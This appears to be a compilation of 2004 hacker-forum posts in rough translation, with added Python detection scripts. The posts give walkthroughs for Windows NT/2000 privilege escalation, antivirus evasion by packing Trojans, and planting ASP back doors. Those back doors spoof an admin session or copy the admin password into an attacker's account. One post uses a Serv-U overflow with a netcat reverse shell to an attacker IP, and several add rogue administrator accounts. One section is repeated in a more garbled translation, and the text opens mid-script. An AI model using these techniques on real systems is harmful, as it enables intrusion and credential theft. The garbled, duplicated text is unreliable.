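    """SET overwrites the whole list, so every entry to keep must be passed, quoted."""
    quoted = " ".join(f'"{p}"' for p in paths)
    return f"cscript {adsutil} set w3svc/InProcessIsapiApps {quoted}"


def remediation(output: str) -> tuple:
    """(offending entries, command that restores the list without them)."""
    paths = parse_inprocess_list(output)
    bad = find_script_engines(paths)
    return bad, build_set_command([p for p in paths if p not in bad])


if __name__ == "__main__":
    bad, cmd = remediation(SAMPLE_GET_OUTPUT)
    print("in-process script engines:", bad)
    print(cmd)
```

Because SET replaces the whole list rather than appending, a dropped quote or a missing entry silently unloads a legitimate in-process DLL; building the command from the parsed list, and checking the parsed count against the "(N Items)" header, avoids the hand-copy mistake both posts warn about.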

- Author: vjoy

- Published: 2004-12-25 20:41:06

-

Winnt / 2000 upgrade permissions

WINDOWS NT / 2000 universal improvement method

Attackers usually increase their permissions to the administrator group after obtaining system certain access rights, so that the attacker controls the computer system. This has the following methods: 1. Get the administrator password, next time you can use this password to enter the system; first create a user, then add this normal addition to the administrator group, or simply directly put an opacity Users are added to the administrator group such as GUEST; 3. Install the back door.

This paper briefly describes how to improve privileges commonly used in Windows NT4 and Windows 2000 attackers. Below is a specific method:

Method 1: Download the system's% WINDIR% // REPAIR // sam. * (WinNT 4 is Sam._ and Windows 2000 is SAM) file, then use L0PHT and other software to crack, as long as you can get, Kenhua time, It must be cracked. Question: (1) The attacker does not necessarily access the file (see the attacker's identity and administrator settings); (2) This file is a list of accounts when the last system backup (or the first system installation is If you change your account password, it is useless.

Method 2: Using PWDUMP (L0PHT, Windows 2000 is invalid) or PWDUMP2, obtain the current user list and password encrypted list, and then crack this list with L0PHT.

Question: Ordinary users cannot successfully run the PWDUMP class program (no permissions), such as the IUSR_Computer identity when using the Unicode vulnerability to enter the system, which is generally only on the guests group, and running the PWDUMP class will fail.

(The above two are offline)

Method 3: Remote cracking and guessing using enum and other programs. ENUM can use a specified dictionary to crack a user of a remote host.

Question: (1) If the system sets the account lock, crack a few times, the account is locked, temporarily can't be broken; (2) To open the NetBIOS connection remote system, it is the 139 port of TCP, if the firewall is filtered If Enum cannot be connected to the host.

(The above method is to obtain a password by cracking, and there is a way to upgrade the current user to the administrator group directly.)

Method 4: GetAdmin (on Windows NT 4) and PipeUpAdmin (on Windows 2000) add the current user account to the local Administrators group. PipeUpAdmin is quite powerful; ordinary users and even Guests-group users can run it successfully.

Problem: GetAdmin was fixed in SP4 and cannot be used on Windows NT 4 systems at SP4 or later. There is an enhanced version of GetAdmin, but it does not seem to run successfully on SP6a either.

Note: this method exploits a security vulnerability in Windows NT 4, which is resolved by installing the patch.

(There is also another method.)

Method 5: In the registry of Windows NT 4 and Windows 2000, the user's shell program (Explorer.exe) is specified not by an absolute path but by a bare file name, i.e. a relative path (for compatibility reasons).

Because of the search order used when the system starts the program, %SystemDrive%\Explorer.exe gets executed, which gives an attacker a chance to have his own program executed the next time a user logs in.

Problem: the attacker must have write permission to the root directory of the logical drive on which the system is installed, and administrators generally forbid ordinary users from writing to that directory.

Note: this method exploits a security vulnerability in Windows NT 4 / Windows 2000, which is resolved by installing the patch.

Method 6: Trojans. Upload a Trojan and run it; after the system restarts, the Trojan runs with the identity of the locally logged-in user, and the attacker who connects to it then has that user's permissions. Since it is generally always an administrator who logs in locally, this is likely to yield administrator permissions. Problems: (1) anti-virus software or a virus firewall may prevent the Trojan from running, and may delete it.

(2) Some Trojans cannot run under a Guests-group identity, which may be related to the way they set themselves to run automatically: if there is no permission to rewrite the auto-run location in the registry, or no permission to write to the %SystemRoot%\system32 directory (Trojans generally rename themselves and then write into the system directory; without write permission to the system directory the Trojan cannot be executed successfully), the Trojan fails.

Solution: a compression program can be used (not an ordinary archiver, but an executable packer that makes the file smaller while it can still be executed normally) to compress the Trojan, so that it escapes the signature detection of anti-virus software. I used ASPack to compress a Trojan successfully, and it escaped the official version of Kingsoft (Jinshan) anti-virus. However, some Trojans cannot be compressed with ASPack, such as Glacier.

Method 7: GINA / GinaStub Trojan. Although this is also called a Trojan, its function differs greatly from the above: an ordinary Trojan is installed on the other side, and once it runs you can use the client to connect to the server side and operate it. GinaStub usually consists of a single dynamic-link library file that must be installed and uninstalled manually; its function is not to control the server side from a client but simply to capture users' login passwords.

Problem: installation is troublesome, the chance of success is low, and improper installation can leave the system unable to start.

Note: this method does not exploit a system security vulnerability, so the problem cannot be solved by installing a patch. For GINA, see the other article "Winlogon Login Management and GINA Introduction".

Method 8: Local overflow. Buffer overflow is the best attack method because it generally yields system or administrator privileges; many remote overflow attacks do not require running a program beforehand, whereas a local overflow is just right for raising privileges. The IIS 4 ASP extension on Windows NT 4 has a local overflow vulnerability, and the Windows 2000 Still Image service also has an overflow vulnerability; using these, an attacker can obtain system privileges. Of course, many programs on Windows NT and Windows 2000 have overflow vulnerabilities, but they are not always running, so the chance of exploiting them is relatively small.

Problems: (1) the ASP extension overflow requires the attacker to have write permission to the website's script directory, in order to place the attack program on the website and then execute it.

(2) The Still Image service is not installed by default; it is installed automatically when the user installs a still image device (such as a digital camera or scanner) on Windows 2000.

Note: this method exploits a security vulnerability in Windows NT 4 / Windows 2000, which is resolved by installing the patch.

Windows 2000-specific privilege escalation methods. Method 1: the Windows 2000 input method (IME) vulnerability. Using this vulnerability anyone can execute programs as LocalSystem, so it is generally limited to people with physical access to the Windows 2000 computer. Of course, if Terminal Services is enabled, an attacker can also exploit the vulnerability remotely.

Note: this method exploits a security vulnerability in Windows 2000; installing the patch solves the problem.

Method 2: Using the Windows 2000 Network DDE DSDM service vulnerability, an ordinary user can execute any program as LocalSystem, change passwords, add users and so on. Guests-group users can also exploit the vulnerability successfully.

Problem: this service is not started by default; it must be started first.

Note: this method exploits a security vulnerability in Windows 2000; installing the patch solves the problem.

Method 3: When the Windows 2000 Telnet service creates a session process, it creates a named pipe and uses it to execute commands. However, the pipe name is predictable, and if Telnet finds that a pipe with that name already exists it simply uses it. An attacker exploits this by creating the pipe name in advance; when Telnet next creates a session process, the attacker's code runs in the LocalSystem context.

Note: this method exploits a security vulnerability in Windows 2000; installing the patch solves the problem.

Method 4: Windows 2000 has a vulnerability that uses the debug registers to raise privileges. If an attacker can run a program on Windows 2000 and uses this vulnerability, he can at least obtain write access to %windir%\system32 and to the HKCR registry hive. Because the x86 debug registers DR0-DR7 are shared globally by all processes, a hardware breakpoint set in one process affects other processes and services.

Note: this method exploits a security vulnerability in Windows 2000, but Microsoft has not yet released a patch for it, while exploit programs for it have already appeared; so the only way to prevent its use is to block the attacker's point of entry.

--------------------------------------------------------------------------------

- Author: vjoy

- Release time: 2004-12-25 20:47:03

- Cleverly using an ASP Trojan to obtain backend management rights (this is a classic ... I had not realized it was already posted)

Author: aweige, from: Chinese Hackers Red Army

Following the upload vulnerability in the Dvbbs forum and the recently disclosed upload vulnerabilities in various ASP systems, which exposed ASP systems going back two years, many friends probably have a lot of WebShell "broilers" (compromised hosts); what to do with them varies from person to person. Some keep escalating privileges and intruding further, some just look around and move on, and some, once the novelty of the WebShell wears off, are tempted by the mystery of the backend. In fact, for many powerful systems, a good back door in the backend is what I'm after, huh, huh, huh .......... But now many new versions of ASP systems encrypt passwords with MD5 and pair that with strict verification code. Does that mean we cannot break through these restrictions? NO! I am going to talk about how to break through them. Let's get straight to the point; there is good stuff, FOLLOW ME ..........

Session spoofing

First let me briefly describe the authentication principle of a typical ASP system.

In general, the backend administrator enters an account and password on the login page, and the program looks up that username and password in the database. If the account and password exist, it regards you as an administrator and gives you a Session value that represents your identity. Alternatively, the program first takes your username and password, then fetches the administrator account and password from the administrator table in the database and compares them with what you submitted; if they are equal, it gives you the Session value that represents your identity. Then, whenever you enter any management page, it first verifies your Session value: if you are an administrator it lets you through; otherwise it redirects you back to the login page or shows some strange warning, depending on the programmer's personal preference. Knowing the principle, our idea is to modify its code through our ASP Trojan and obtain an administrator Session, so that even without the administrator password we can roam the backend unobstructed. I call this method Session spoofing. Space does not permit describing it in detail for every system; this article only uses the Power Article System as an example.

Power Article System 3.51 (Figure 1)

In fact, all versions of the Power Article System are affected, including PowerEasy. Everyone can practice on their own.

Let's look at its verification code. In Power Article 3.51 the verification page is admin_chklogin.asp, and the verification code is as follows:

    ..........
    Else
        rs("LastLoginIP") = Request.ServerVariables("REMOTE_ADDR")
        rs("LastLoginTime") = Now()
        rs("LoginTimes") = rs("LoginTimes") + 1
        rs.Update
        Session.Timeout = SessionTimeout
        Session("adminName") = rs("UserName")
        rs.Close
        Set rs = Nothing
        Call CloseConn()
        Response.Redirect "admin_index.asp"

The code before Else verifies the username and password; now look at the Else branch: if the username and password are correct, it gives you two Session values:

    Session.Timeout = SessionTimeout
    Session("adminName") = rs("UserName")

Let's see how the other management pages verify the Session; admin_index.asp does it like this:

    If Session("adminName") = "" Then
        Response.Redirect "admin_login.asp"
    End If

It looks strict, but look: all it verifies here is a Session named adminName, so as long as our Session contains adminName, can't we pass? OK, let's start. First get its administrator account (do I need to teach you that? You can find it on his website or download the database directly). Then find a page to modify; I look for one that nobody visits, and change the contents of FriendSite.asp (the friendly links page), so the administrator is unlikely to notice. Use the ASP Trojan's editing function to edit its content and add a few lines at the bottom of the page:

    Dim id
    id = Trim(Request("qwe"))
    If id = "120" Then
        Session("adminName") = "admin"  ' assumed; in practice use the administrator account you want
    End If

Simply put, these lines take the value of hehe from the address bar; if hehe = 120, the system gives us a Session whose value is admin. OK, let's go in and have a look (Figure 2):

Do you see anything? No? It's still the normal page, but now enter its backend management homepage in the address bar, and there it is (Figure 3):

Oh, don't do bad things ............

Summary: first get the administrator account, then find its verification page and, following its verification logic, write the back door we want. Different systems verify in different ways; for example, the Qingchuang article system does not only verify your username. But our overall approach is the same: supply whatever it verifies.

Password stealing

The method above pales in front of the Dvbbs forum or other forums, because forums, being highly interactive, have put a lot of thought into verification. Take Dvbbs as an example: to log in to the backend, it first verifies that you have logged in at the front end, and returns a fake page if you haven't. After you log in at the front end, the system gives you a Session recording your cache name and your ID; when you log in to the backend it takes these out and compares whether your front-end and back-end identities are consistent, and only then do you pass. Faced with such strict verification, is there any way into the backend? Yes ... no (who threw that at me? what a waste). But we can think of a new way: since verification is so strict, what if I simply take the password openly? So the new idea here is to obtain its plaintext password. When is there a plaintext password? Yes, when the administrator logs in. OK, so we do our work there: have the password he logs in with sent to us, and then we log in with it. Doesn't this look a lot like a sniffer? A few months ago the brothers, out in the field with a hardware sniffer together with the provincial network security department, caught the person behind an illegal movie website: a 4000 G hard drive, dozens of servers; in a word: cool.

OK, let's start modifying its code. Edit Login.asp and add the following lines:

    If Not IsNull(Trim(Request("UserName"))) Then
        If Request("UserName") = "admin" Then
            sql = "Update [Dv_User] Set UserEmail = (Select UserPassword From [Dv_User] Where UserName='" & Request("UserName") & "') Where UserName='aweige'"
            Conn.Execute(sql)
        End If
    End If

The meaning of these lines is that if admin (a hypothetical name; in practice use the actual administrator name) logs in successfully, the database is updated and his password is put into the e-mail field of our own account information. Of course, you must first register a username in the forum. The result is shown in Figure 4.

Also note that the default admin table name in the database differs somewhat between version 7.0 and above and earlier versions, so do not copy this blindly in actual operation.

Postscript:

For the above two methods, I still cannot think of a more effective solution, because once a Trojan has been planted on your website there is no way to stop people from inserting code. If you have a good solution, remember to tell me.

In addition, I hope everyone won't go and do damage. At that time I really didn't want to see that; I wish all network administrators well and hope you won't run into crackers.

[This post has been edited by the author at 2004-12-25 20:51:09]
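For the postscript's question of how a site owner could catch these two edits: the following Python is a defensive example added here, not code from the original post or from any of the products named. It baselines a classic-ASP web root with per-file SHA-256 hashes, then scans every changed or added .asp file for an assignment to the privileged Session key outside the allow-listed login page and for an UPDATE that copies a password column into another column; the file names, contents and Session key are constructed samples.

```python
"""Detect planted 'session spoof' and password-copy back doors in a classic-ASP web root.
Added defensive example, not code from the original post; all file names, contents and
the Session key are constructed samples."""
import hashlib
import re
import tempfile
from pathlib import Path

ADMIN_SESSION_KEYS = {"adminname"}      # key the article's admin_chklogin.asp sets
LOGIN_PAGES = {"admin_chklogin.asp"}    # only page allowed to set it (assumption)

# Anchored at statement start so 'If Session("x") = "" Then' (a comparison) is not flagged.
SESSION_ASSIGN = re.compile(
    r'(?:^[ \t]*|:[ \t]*|\bthen[ \t]+|\belse[ \t]+)session\s*\(\s*"(?P<key>[^"]+)"\s*\)\s*=',
    re.IGNORECASE | re.MULTILINE)
# UPDATE ... SET col = (SELECT <...password...> FROM ...), the shape of the article's second edit.
PASSWORD_COPY = re.compile(
    r"\bupdate\b.*?\bset\b.*?=\s*\(\s*select\s+\w*password\w*\s+from",
    re.IGNORECASE | re.DOTALL)

def sha256_file(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()

def build_baseline(webroot: Path) -> dict:
    """Relative path -> SHA-256 for every file under webroot (take it while the site is clean)."""
    return {p.relative_to(webroot).as_posix(): sha256_file(p)
            for p in sorted(webroot.rglob("*")) if p.is_file()}

def integrity_diff(baseline: dict, current: dict) -> dict:
    return {
        "changed": sorted(k for k in current if k in baseline and baseline[k] != current[k]),
        "added": sorted(k for k in current if k not in baseline),
        "removed": sorted(k for k in baseline if k not in current),
    }

def scan_source(rel_path: str, source: str) -> list:
    """Findings for one ASP file."""
    findings = []
    name = rel_path.rsplit("/", 1)[-1].lower()
    for m in SESSION_ASSIGN.finditer(source):
        key = m.group("key")
        if key.lower() in ADMIN_SESSION_KEYS and name not in LOGIN_PAGES:
            findings.append(f'{rel_path}: sets Session("{key}") outside the login page')
    if PASSWORD_COPY.search(source):
        findings.append(f"{rel_path}: UPDATE copies a password column into another column")
    return findings

def audit(webroot: Path, baseline: dict) -> dict:
    """Integrity diff plus source findings for every changed or added .asp file."""
    report = integrity_diff(baseline, build_baseline(webroot))
    report["findings"] = []
    for rel in report["changed"] + report["added"]:
        if rel.lower().endswith(".asp"):
            report["findings"] += scan_source(rel, (webroot / rel).read_text(errors="replace"))
    return report

# Constructed stand-ins for the pages the article mentions (not the real products' code).
LEGIT_CHKLOGIN = '''<%
If rs.EOF Then
    Response.Redirect "admin_login.asp"
Else
    Session("adminName") = rs("UserName")
End If
%>'''
LEGIT_INDEX = '<% If Session("adminName") = "" Then Response.Redirect "admin_login.asp" %>'
LEGIT_FRIENDSITE = "<html><body>friendly links</body></html>"
LEGIT_LOGIN = "<% ' front-end login page (constructed) %>"
# The two edits the article describes, reduced to what the rules need to see.
PLANTED_SESSION = '''<%
If Trim(Request("qwe")) = "120" Then
    Session("adminName") = "admin"
End If
%>'''
PLANTED_COPY = '''<%
If Request("UserName") = "admin" Then
    Conn.Execute("Update [Dv_User] Set UserEmail = (Select UserPassword From [Dv_User] " & _
                 "Where UserName='admin') Where UserName='attacker'")
End If
%>'''

def demo() -> dict:
    """Baseline a clean site, apply the two planted edits, audit, and return the report."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        for name, body in {"admin_chklogin.asp": LEGIT_CHKLOGIN, "admin_index.asp": LEGIT_INDEX,
                           "FriendSite.asp": LEGIT_FRIENDSITE, "Login.asp": LEGIT_LOGIN}.items():
            (root / name).write_text(body)
        baseline = build_baseline(root)
        (root / "FriendSite.asp").write_text(LEGIT_FRIENDSITE + "\n" + PLANTED_SESSION)
        (root / "Login.asp").write_text(LEGIT_LOGIN + "\n" + PLANTED_COPY)
        return audit(root, baseline)
```

The baseline has to be stored off the web server; an attacker with write access to the web root can otherwise rewrite it along with the pages.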

--------------------------------------------------------------------------------

- Author: vjoy

- Release time: 2004-12-25 20:53:13

-

Using an ASP Trojan and KV2004 to get administrator privileges

This is my first time writing anything, and I can't write well; please forgive me and don't laugh. There is nothing technical here, just a little experience from a rookie. OK, let's start . . .

The Upfile.asp vulnerability of a while ago caused quite a stir, and it is indeed very powerful; I believe many newcomers have collected a lot of back doors with it. But the rights of an ASP Trojan are really limited: edit a few articles, delete a few pictures, that's no use. Without administrator privileges you are wasting the masters' work on this vulnerability. OK, I want to escalate privileges, so I search! I tried almost every privilege escalation method found online, and none worked; the patches were very complete. Next I used FindPass to get the administrator's password, and failed: FindPass needs administrator privileges. With PsList I saw Rising anti-virus and the Skynet (Tianwang) firewall; against such defences most of the tools found online are useless. What to do? No way.

Every escalation attempt ran into Rising's monitoring. Putting a BAT file that adds a user with privileges into the Startup group is a bit stupid but has some feasibility; annoyingly, I couldn't even add it. "Program Files" and the other directories on C: could not be written to, let alone the registry. Depressed, I left a message for the administrator and went offline.

The next day I came back to look: the picture had been changed, so the administrator must have found it. This time it wasn't easy. Through the ASP Trojan I went in and saw that the few EXEs I uploaded the day before had been deleted, but the ASP Trojan was still alive. But! The C drive had a new folder, called KV2004. The administrator had uninstalled Rising and installed KV2004; I entered Program Files to confirm that Rising was gone. (By the way, most anti-virus software installs to C:\Program Files\ by default, but KV's default installation path is C:\kv2004\.) At this point, we can bind our executable to KV2004 and have it start with KV. Because KV is not in one of the three protected folders "Program Files", "Winnt" and "Documents and Settings", it may be possible to modify or upload files there. Action! Find an HTM file in KV2004 and delete it (to see whether there is write and delete permission):

    C:\> del C:\kv2004\Getlicense.htm
    Access denied

Strange; let's look at the attributes:

    C:\> attrib C:\kv2004
    S  R    C:\kv2004

Oh, it is read-only.

    C:\> attrib -r -s C:\kv2004

OK! Try again:

    C:\> del C:\kv2004\Getlicense.htm

Success! Write a BAT file that adds an account and raises its permissions, then bind the BAT file with the KV2004 system service file kvsrvxp.exe (note: try several binders, scanning once after each, because KV treats the files generated by many binders as viruses). When it is ready to upload, first delete the original kvsrvxp.exe:

    C:\> del C:\kv2004\kvsrvxp.exe
    Access denied

It may be that kvsrvxp.exe is in use by Windows and cannot be deleted. No way? No, that can't stop me:

    C:\> ren C:\kv2004\kvsrvxp.exe kv.exe

OK! Then use the ASP Trojan to upload the modified kvsrvxp.exe into KV2004, and go to sleep.

After 4 hours, run:

    net user

Already in the Administrators group. Next you have to shut down the firewall and the anti-virus software, or you can use a Trojan, haha!

I think intrusion has no fixed pattern; analyse each situation specifically. Anti-virus software can also help us. Here I only provide a way of thinking; please advise.

How to bypass a firewall to escalate privileges

The focus of this article is WebShell privilege escalation and bypassing firewalls.

Without further nonsense, let's get to the topic.

First determine the target:

http://www.sun**.com, a common virtual host. Using the Upfile vulnerability, I believe everyone finds that getting a WebShell is not difficult. This time we got the WebShell not through Dvbbs but because the upload filtering of the Free Power 3.6 software is not strict. The website

http://www.sun**.com/lemon/index.asp is a Free Power 3.6 article system. XR used WinHex.exe and WSockExpert.exe to upload a web Trojan, newmm.asp; people who have used Door.exe know that this is used to upload the contents of an ASP Trojan. So we uploaded Ocean 2005a and obtained a WebShell.

Test the permissions: run SET in CMD to get some information about the host: the system disk is D:, and the WebShell has execute permission. Then let's see what is on C:. Is it a dual-boot system? After browsing, there were no system files, only some junk files; dizzying. Never mind, keep checking: the virtual host has Serv-U, no surprise there; it is version 5.0.0.8. Oh, there is a local overflow for that, great. Idea: upload the Serv-U local overflow file srv.exe and nc.exe, and use NC to reverse-connect and obtain a system shell. Everyone finds that uploading with the Ocean 2005a component is not easy (at least I always run into this problem); no matter, use the Rain upload component, three files in total: up.htm, upload.asp and UploadClass.asp. Upload upload.asp and UploadClass.asp into the same folder; up.htm is used locally, and the link address in up.htm is changed to

http://www.sun**.com/lemon/UPLOAD.ASP, after which you can upload.

After srv.exe and nc.exe were uploaded to h:\long\suwing***\lemon (the website directory), I found there was no execute permission there. Never mind; from experience, D:\Documents and Settings\All Users\ on a typical system should have execute permission. So I wanted to copy the files there, but found that our WebShell had no write permission on the D drive; dizzying.

You can browse D:\Program Files\Serv-U\ServUDaemon.ini but cannot change it. Crack the Serv-U password? Dizzy, no thanks.

Unable to proceed, I suddenly wondered why the system had not been placed on the C drive: is C a FAT32 partition? (This was later proven right. Here, if the host has a Win98 system disk, 99% of the time it is a FAT32 partition. We have also met hosts with Ghost, whose backup disk, in order to back up under DOS, is generally a FAT partition.) If the system disk is FAT32, the website has no security at all. Although C: is not the system disk, we have execute permission there. So copy srv.exe and nc.exe to C:\ and run srv.exe "nc.exe -e cmd.exe 202.*.*.* 888", where 202.*.*.* is our broiler; before this we ran nc -l -p 888 on the broiler. We are on an internal network with no public IP, unhappy-ing.

We successfully got a system shell on the broiler. (It looks simple; in fact we met setbacks. We found that some versions of NC have no -e, having assumed that every NC in the world works the same. Later we found that different versions of NC do not interoperate and produce garbled output, with no way around it. For that we uploaded N times, failed N times, acted silly N times, and finally succeeded. Being a hacker really requires patience and perseverance.)

Though happy, we were still not satisfied, because this shell is too slow. So I wanted to use our most common tool, Radmin; in fact the administrator can press Alt+Ctrl+Del and find r_server in the process list, but I still like it because it won't be killed. OK, upload AdmDll.dll, raddrv.dll and r_server.exe to h:\long\sun***\lemon, use the shell obtained via NC to copy them into D:\WinNT\System32\, and run: r_server /install, net start r_server, r_server /pass:ras /save. After a long wait, it finally reported success. Then connect with Radmin: connection failed. Dizzy, I forgot there was a firewall. Upload PsList and PsKill; found BlackICE, a Trojan killer and so on. Kill them; although that allows logging in, it can't last long. The firewall does not block ports 21 and 80, so our thinking returns to Serv-U. Download its ServUDaemon.ini, overwrite the local machine's ServUDaemon.ini with it, add a user named XR with password RAIN and all permissions on the local Serv-U. Use the old method: upload, write to D:\Program Files\Serv-U\, overwriting the original ServUDaemon.ini. Although I waited for a long time, it succeeded. So I used FlashFXP, and got a 530 error. Depressed; why did it fail? (From experience it should work, but I don't know why it didn't; please advise.)

Anyway, we just need to restart Serv-U. How to restart it? At first I wanted to use shutdown to restart the system, but then we would lose the NC shell and might also be discovered. Later my eyes lit up: don't we have PsKill? I found the process with PsList: ServUDaemon. Kill it. Then run D:\Program Files\Serv-U\ServUAdmin.exe; note that it is this one, not ServUDaemon.exe.

OK, now log in directly: ls, haha, the system is in my hands. Can we run system commands? Yes, like this:

    ftp> quote site exec net user XR RAIN /add

Running net user from the WebShell shows that it succeeded.

The whole intrusion ends here; afterwards we started a discussion. In fact there are many good rootkits for breaking through firewalls, but we feel that using the services the host already has is the safest.

--------------------------------------------------------------------------------

- Author: vjoy

- Release time: 2004-12-25 20:35:14

-

Making asp.dll run as System to escalate privileges

There are two traditional escalation methods circulating online:

1. In the GUI, set Default Web Site -> Home Directory -> Application Protection to Low; this gives ASP System permissions. But this method is easily discovered, so another method circulates online that uses adsutil.vbs to escalate. That is what I'll talk about today: escalating privileges with adsutil.vbs.

2. Do it with adsutil.vbs.

I have seen many animations and articles teaching this method, but none that introduce the principle, so let me give my personal view:

First an example:

There is a pack of dogs, and a few of them are old-timers with supreme privileges, while the other dogs have pitifully few permissions.

Back to the computer:

In IIS there are several DLL files that have privileges. We can think of them as the senior dogs with System privileges, while ASP's asp.dll is an ordinary dog whose permissions are limited.

So if asp.dll becomes a senior dog, doesn't ASP then have System authority? That's it. So our idea is to add asp.dll to the privileged DLL family. The steps are:

<1> see which DLLs are privileged;

<2> add asp.dll to the privileged group.

OK, let's go through the process in practice.

1) View the DLL files that have privileges. The command is:

    cscript adsutil.vbs get /w3svc/InProcessIsapiApps

The output is:

    C:\inetpub\AdminScripts> cscript adsutil.vbs get /w3svc/InProcessIsapiApps
    Microsoft (R) Windows Script Host Version 5.1 for Windows
    Copyright (C) Microsoft Corporation 1996-1999. All rights reserved.

    InProcessIsapiApps: (List) (5 items)
      "C:\winnt\system32\idq.dll"
      "C:\winnt\system32\inetsrv\httpext.dll"
      "C:\winnt\system32\inetsrv\httpodbc.dll"
      "C:\winnt\system32\inetsrv\ssinc.dll"
      "C:\winnt\system32\msw3prt.dll"

See that? It shows that the privileged family consists of: idq.dll, httpext.dll, httpodbc.dll, ssinc.dll and msw3prt.dll. These files may differ from machine to machine.

2) Add asp.dll to the privileged family:

Because asp.dll is located at C:\winnt\system32\inetsrv\asp.dll (the location may differ on different machines), we now run:

    cscript adsutil.vbs set /w3svc/InProcessIsapiApps "C:\winnt\system32\idq.dll" "C:\winnt\system32\inetsrv\httpext.dll" "C:\winnt\system32\inetsrv\httpodbc.dll" "C:\winnt\system32\inetsrv\ssinc.dll" "C:\winnt\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll"

OK, now you can use cscript adsutil.vbs get /w3svc/InProcessIsapiApps to see whether it was added.

Note the difference in usage between get and set: one views, the other sets. Also, you must first change to the directory C:\inetpub\AdminScripts.

So if you are an administrator and your machine has been used with this trick to raise ASP to System permissions, the way to stop asp.dll from being privileged is to use the same set command to overwrite what was just set:

    cscript adsutil.vbs set /w3svc/InProcessIsapiApps "C:\winnt\system32\idq.dll" "C:\winnt\system32\inetsrv\httpext.dll" "C:\winnt\system32\inetsrv\httpodbc.dll" "C:\winnt\system32\inetsrv\ssinc.dll" "C:\winnt\system32\msw3prt.dll"

That's it. When you run cscript adsutil.vbs get /w3svc/InProcessIsapiApps and no longer see asp.dll, the permissions of ASP have returned to what they were before.
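As an added defensive check (not code from the original post, and not adsutil.vbs itself), the following Python parses the output of cscript adsutil.vbs get /w3svc/InProcessIsapiApps in the format shown above and reports any DLL that is not on a known-good baseline, then builds the set command that restores the baseline. The baseline and both sample outputs are constructed from the listing in the article; on a real server the baseline should come from a known-good IIS install.

```python
"""Audit the IIS 5 InProcessIsapiApps list for DLLs that should not run in-process.
Added defensive example, not code from the original post. Parses the text that
`cscript adsutil.vbs get /w3svc/InProcessIsapiApps` prints (the format shown in the
article) and compares it with a baseline; the sample outputs below are constructed."""
import re

# Baseline taken from the article's listing. Assumption: on your machine take it
# from a known-good IIS install rather than from this list.
EXPECTED = {
    r"c:\winnt\system32\idq.dll",
    r"c:\winnt\system32\inetsrv\httpext.dll",
    r"c:\winnt\system32\inetsrv\httpodbc.dll",
    r"c:\winnt\system32\inetsrv\ssinc.dll",
    r"c:\winnt\system32\msw3prt.dll",
}

def normalize(path: str) -> str:
    """Case and slash direction do not matter to the metabase, so neither should they here."""
    return path.strip().strip('"').replace("/", "\\").lower()

def parse_adsutil_list(output: str, prop: str = "InProcessIsapiApps") -> list:
    """Return the quoted entries of a (LIST) property from adsutil.vbs output, normalized."""
    head = re.search(rf"{prop}\s*:\s*\(list\)\s*\((\d+)\s+items?\)", output, re.IGNORECASE)
    if not head:
        raise ValueError(f"{prop} list not found in output")
    declared = int(head.group(1))
    entries = [normalize(e) for e in
               re.findall(r'^\s*"([^"]+)"\s*$', output[head.end():], re.MULTILINE)]
    if len(entries) != declared:
        raise ValueError(f"adsutil declared {declared} items but {len(entries)} were parsed")
    return entries

def audit_inprocess(output: str, expected=EXPECTED) -> dict:
    """Entries present, entries not on the baseline (e.g. asp.dll), and baseline entries missing."""
    entries = parse_adsutil_list(output)
    return {"entries": entries,
            "unexpected": [e for e in entries if e not in expected],
            "missing": sorted(expected - set(entries))}

def restore_command(expected=EXPECTED) -> str:
    """The adsutil.vbs set command that puts the baseline back (the remedy the article gives)."""
    return ("cscript adsutil.vbs set /w3svc/InProcessIsapiApps "
            + " ".join(f'"{p}"' for p in sorted(expected)))

# Constructed outputs in the shape adsutil.vbs prints.
CLEAN_OUTPUT = r"""Microsoft (R) Windows Script Host Version 5.1 for Windows
Copyright (C) Microsoft Corporation 1996-1999. All rights reserved.

InProcessIsapiApps              : (LIST) (5 Items)
  "C:\WINNT\System32\idq.dll"
  "C:\WINNT\System32\inetsrv\httpext.dll"
  "C:\WINNT\System32\inetsrv\httpodbc.dll"
  "C:\WINNT\System32\inetsrv\ssinc.dll"
  "C:\WINNT\System32\msw3prt.dll"
"""
# Same machine after the trick in the article: one extra entry.
TAMPERED_OUTPUT = (CLEAN_OUTPUT.replace("(5 Items)", "(6 Items)")
                   + '  "C:\\WINNT\\System32\\inetsrv\\asp.dll"\n')

if __name__ == "__main__":
    result = audit_inprocess(TAMPERED_OUTPUT)
    for dll in result["unexpected"]:
        print("unexpected in-process ISAPI DLL:", dll)
    if result["unexpected"]:
        print("restore with:", restore_command())
```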

--------------------------------------------------------------------------------

- Author: vjoy

- Published: 2004-12-25 20:41:06

-

WinNT/2000 privilege escalation

Windows NT/2000 general privilege escalation methods

Attackers usually increase their permissions to the administrator group after obtaining system certain access rights, so that the attacker controls the computer system. This has the following methods: 1. Get the administrator password, next time you can use this password to enter the system; first create a user, then add this normal addition to the administrator group, or simply directly put an opacity Users are added to the administrator group such as GUEST; 3. Install the back door.

This paper briefly describes how to improve privileges commonly used in Windows NT4 and Windows 2000 attackers. Below is a specific method:

Method 1: Download the system's% WINDIR% // REPAIR // sam. * (WinNT 4 is Sam._ and Windows 2000 is SAM) file, then use L0PHT and other software to crack, as long as you can get, Kenhua time, It must be cracked.

Question: (1) The attacker does not necessarily access the file (see the attacker's identity and administrator settings); (2) This file is a list of accounts when the last system backup (or the first system installation is If you change your account password, it is useless.

Method 2: Using PWDUMP (L0PHT, Windows 2000 is invalid) or PWDUMP2, obtain the current user list and password encrypted list, and then crack this list with L0PHT.

Question: Ordinary users cannot successfully run the PWDUMP class program (no permissions), such as the IUSR_Computer identity when using the Unicode vulnerability to enter the system, which is generally only on the guests group, and running the PWDUMP class will fail.

(The above two are offline)

Method 3: Remote cracking and guessing using enum and other programs. ENUM can use a specified dictionary to crack a user of a remote host.

Question: (1) If the system sets the account lock, crack a few times, the account is locked, temporarily can't be broken; (2) To open the NetBIOS connection remote system, it is the 139 port of TCP, if the firewall is filtered If Enum cannot be connected to the host. (The above method is to obtain a password by cracking, and there is a way to upgrade the current user to the administrator group directly.)

Method 4: GetMin (under WinNT 4), PipeUpadmin (under Windows 2000), run the current user account to the administrator group in this unit. PipeUpadmin is relatively powerful, and ordinary users and guests users can run successfully.

Question: GetMin has fixed fixed in SP4, which cannot be used for Winnt 4 systems above SP4. Of course, there is a GetMin enhancement version, but it seems that it does not run successfully in SP6A.

Note: This method uses the security vulnerability of Winnt 4 systems to install patch resolution.

(In addition, there is also a way to communicate.)

